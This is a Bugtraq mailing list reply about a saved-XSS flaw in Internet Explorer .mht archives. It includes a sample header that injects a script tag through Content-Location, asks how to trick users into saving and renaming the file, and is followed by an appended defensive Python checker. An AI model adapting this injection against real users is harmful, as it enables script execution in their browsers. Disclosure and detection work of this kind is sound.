Bugtraq mailing list archives
Re: Saved XSS vulnerability in Internet Explorer
From: ecco <eccocce () gmail com>
Date: Tue, 16 Nov 2010 12:55:39 +0100
Hi there,

It works because there is a "Content-Location" header in the .mht file, so our malicious code will be there. "Content-Location" is outside <html></html>, so it will work only in IE (with the .htm extension, of course).

Example code of an .mht file with XSS:

[...]
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: quoted-printable
Content-Location: http://localhost/test/index.php?--><script>alert("XSS")</script>

=EF=BB=BF<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML =
xmlns=3D"http://www.w3.org/1999/xhtml">
[...]
</HTML>

The question is: how to convince the user to save our page on his HDD and change the extension to .html?

Regards
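A defender-side check for the condition described in this message, as an added example that is not part of the original post: it parses a saved .mht file with Python's email module and flags any Content-Location header that carries raw markup characters. The function names and the sample archive are constructed for illustration; percent-encoding the value is one possible way to neutralise it, not something the thread prescribes.

```python
import re
from email import message_from_bytes

# Characters that should never appear raw in a URL; if they do, the header
# line is literal markup once the archive is renamed and opened as HTML.
UNSAFE = re.compile(r'[<>"\'`\s]')

def suspicious_content_locations(mht_bytes):
    """Return (part_index, value) for each Content-Location with raw markup characters."""
    msg = message_from_bytes(mht_bytes)
    findings = []
    for index, part in enumerate(msg.walk()):
        for value in part.get_all("Content-Location", []):
            # Undo header folding before inspecting the value.
            unfolded = re.sub(r"\r?\n[ \t]+", "", str(value)).strip()
            if UNSAFE.search(unfolded):
                findings.append((index, unfolded))
    return findings

def neutralise(value):
    """Percent-encode the unsafe characters so the value is inert as HTML."""
    return UNSAFE.sub(lambda m: "%%%02X" % ord(m.group()), value)

# Constructed sample: a two-part archive whose first part carries the
# Content-Location value quoted in the message above.
SAMPLE_MHT = (
    b'MIME-Version: 1.0\r\n'
    b'Content-Type: multipart/related; type="text/html";'
    b' boundary="----=_constructed"\r\n'
    b'\r\n'
    b'------=_constructed\r\n'
    b'Content-Type: text/html; charset="utf-8"\r\n'
    b'Content-Transfer-Encoding: quoted-printable\r\n'
    b'Content-Location: http://localhost/test/index.php?-->'
    b'<script>alert("XSS")</script>\r\n'
    b'\r\n'
    b'<HTML></HTML>\r\n'
    b'------=_constructed\r\n'
    b'Content-Type: image/gif\r\n'
    b'Content-Transfer-Encoding: base64\r\n'
    b'Content-Location: http://localhost/test/logo.gif\r\n'
    b'\r\n'
    b'R0lGODlhAQABAAAAACw=\r\n'
    b'------=_constructed--\r\n'
)

if __name__ == "__main__":
    for index, value in suspicious_content_locations(SAMPLE_MHT):
        print("part %d: %s -> %s" % (index, value, neutralise(value)))
```
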